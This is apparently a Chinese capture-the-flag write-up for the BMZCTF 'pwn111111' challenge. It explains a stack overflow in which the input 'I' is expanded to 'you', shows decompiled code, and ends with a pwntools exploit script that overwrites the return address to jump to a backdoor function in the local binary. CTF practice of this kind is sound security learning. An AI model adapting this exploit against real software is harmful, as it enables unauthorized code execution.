![[BMZCTF-pwn] 11-pwn111111](http://www.mshxw.com/aiimages/31/739364.png "[BMZCTF-pwn] 11-pwn111111")
依然没有远程环境,不过这种栈溢出跟libc关系不是很大。
程序很难看懂,看到replace时这里应该是把输入的I转换成YOU。试了一下果然是。用gdb跟进后发现原来60字节的空间就会被输入的32字节替换后填满并可以有溢出,不过溢出不太大,即便把ebp也算上21个I替换后也达不到一个最简单漏洞rop(plt.puts,ret,got.puts)的长度。然后往回找,这里有个把门,直接溢出写后门就行了。
int vuln()
{
const char *v0; // eax
char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF
char v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF
char v4[7]; // [esp+40h] [ebp-18h] BYREF
char v5; // [esp+47h] [ebp-11h] BYREF
char v6[7]; // [esp+48h] [ebp-10h] BYREF
char v7[5]; // [esp+4Fh] [ebp-9h] BYREF
printf("Tell me something about yourself: ");
fgets(s, 32, edata);
std::string::operator=(&input, s);
std::allocator::allocator(&v5);
std::string::string(v4, "you", &v5);
std::allocator::allocator(v7);
std::string::string(v6, "I", v7);
replace((std::string *)v3); // 把I替换成YOU
std::string::operator=(&input, v3, v6, v4);
std::string::~string(v3);
std::string::~string(v6);
std::allocator::~allocator(v7);
std::string::~string(v4);
std::allocator::~allocator(&v5);
v0 = (const char *)std::string::c_str((std::string *)&input);
strcpy(s, v0);
return printf("So, %sn", s);
}
from pwn import *
p = process('./pwn')
context(arch='i386', log_level='debug')
p.sendline(b'I'*20+b'XXXX'+p32(0x8048f0d))
p.recv()
p.interactive()
